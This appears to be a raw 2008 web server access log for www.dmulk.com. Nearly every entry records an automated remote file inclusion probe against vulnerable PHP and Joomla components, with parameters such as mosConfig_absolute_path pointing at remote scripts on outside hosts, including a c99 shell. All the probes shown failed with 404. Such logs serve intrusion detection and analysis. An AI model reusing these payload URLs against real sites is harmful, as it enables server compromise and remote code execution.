124.217.247.166 - - [12/Feb/2008:12:24:53 -0800] "GET /logs/access_080121.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.72.15 - - [12/Feb/2008:12:25:17 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [12/Feb/2008:12:25:17 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [12/Feb/2008:12:25:18 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.78.65 - - [12/Feb/2008:12:26:44 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.78.65 - - [12/Feb/2008:12:26:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:26:45 -0800] "GET /logs/access_080108.log//modules/xoopsgallery/upgrade_album.php?GALLERY? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:26:45 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:27:02 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:12:27:15 -0800] "GET /logs/access_080201.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:12:27:15 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:12:27:16 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:12:28:44 -0800] "GET /logs/access_080105.log/config.php?xcart_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.51.87.246 - - [12/Feb/2008:12:28:55 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [12/Feb/2008:12:28:56 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [12/Feb/2008:12:28:57 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:12:29:12 -0800] "GET /logs/access_080104.log/config.php?xcart_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.185.205 - - [12/Feb/2008:12:29:37 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.185.205 - - [12/Feb/2008:12:29:43 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.185.205 - - [12/Feb/2008:12:29:44 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:12:30:10 -0800] "GET /logs/access_071222.log/config.php?xcart_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:12:30:34 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:12:30:34 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:12:30:37 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:30:38 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.222.135 - - [12/Feb/2008:12:30:39 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [12/Feb/2008:12:30:39 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [12/Feb/2008:12:30:39 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:12:31:29 -0800] "GET /index.php?option=com_find_us&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.138.23 - - [12/Feb/2008:12:31:31 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.138.23 - - [12/Feb/2008:12:31:31 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.138.23 - - [12/Feb/2008:12:31:32 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:31:37 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:31:44 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:31:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:12:31:54 -0800] "GET /logs/access_080106.log/index.php?option=com_find_us&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:12:31:54 -0800] "GET /logs/index.php?option=com_find_us&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.72.15 - - [12/Feb/2008:12:32:00 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:32:15 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:32:16 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:32:16 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:12:32:53 -0800] "GET /logs/access_071230.log/administrator/index2.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:12:32:53 -0800] "GET /administrator/index2.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:12:32:54 -0800] "GET /logs/administrator/index2.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:33:01 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:12:33:05 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:33:49 -0800] "GET /logs/access_080117.log//mcf.php?content=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:33:51 -0800] "GET //mcf.php?content=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:33:54 -0800] "GET /logs//mcf.php?content=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.51.87.246 - - [12/Feb/2008:12:34:10 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:34:51 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:35:53 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.138.23 - - [12/Feb/2008:12:36:17 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:12:36:44 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:12:36:52 -0800] "GET /logs/access_071230.log/administrator/index2.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:12:36:53 -0800] "GET /administrator/index2.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:12:36:53 -0800] "GET /logs/administrator/index2.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:37:17 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:37:18 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:37:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:38:20 -0800] "GET /logs/access_080131.log/index2.php?x=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:38:20 -0800] "GET /index2.php?x=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:38:21 -0800] "GET /logs/index2.php?x=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:38:49 -0800] "GET /logs/access_080108.log/index2.php?x=http://rajakoya.freehostia.com/folder/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:12:38:59 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.185.205 - - [12/Feb/2008:12:39:10 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:12:39:12 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.72.15 - - [12/Feb/2008:12:40:31 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:40:41 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:40:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:40:45 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:41:49 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:41:50 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:41:51 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.78.65 - - [12/Feb/2008:12:42:02 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:12:42:21 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:43:25 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:43:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:12:43:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.51.87.246 - - [12/Feb/2008:12:43:46 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:12:43:46 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:12:43:52 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.106.20 - - [12/Feb/2008:12:44:04 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdakollumerland.nl/site/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
205.234.106.20 - - [12/Feb/2008:12:44:04 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdakollumerland.nl/site/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
203.211.138.23 - - [12/Feb/2008:12:44:38 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:12:46:55 -0800] "GET //skin/zero_vote/error.php?dir=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:12:47:11 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:12:47:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:12:47:22 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.19 - - [12/Feb/2008:12:47:37 -0800] "GET /minamijewelry/html/ HTTP/1.0" 200 13287 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:12:47:41 -0800] "GET /logs/access_080108.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:12:48:01 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:12:48:03 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:12:48:18 -0800] "GET /index2.php?x=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:48:50 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:48:50 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:48:50 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:12:49:00 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:12:49:00 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:12:49:00 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:49:40 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.57.44.150 - - [12/Feb/2008:12:51:18 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.57.44.150 - - [12/Feb/2008:12:51:21 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.57.44.150 - - [12/Feb/2008:12:51:22 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:12:51:24 -0800] "GET /logs/access_071230.log/administrator/index2.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:12:51:25 -0800] "GET /administrator/index2.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:12:51:25 -0800] "GET /logs/administrator/index2.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
208.69.192.133 - - [12/Feb/2008:12:52:04 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.57.44.150 - - [12/Feb/2008:12:52:14 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:12:52:28 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.61.185.205 - - [12/Feb/2008:12:52:31 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.69.213.131 - - [12/Feb/2008:12:52:38 -0800] "GET /index.php?body=http://www.importbarang.com/skins/default_red/customer/js_menu/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
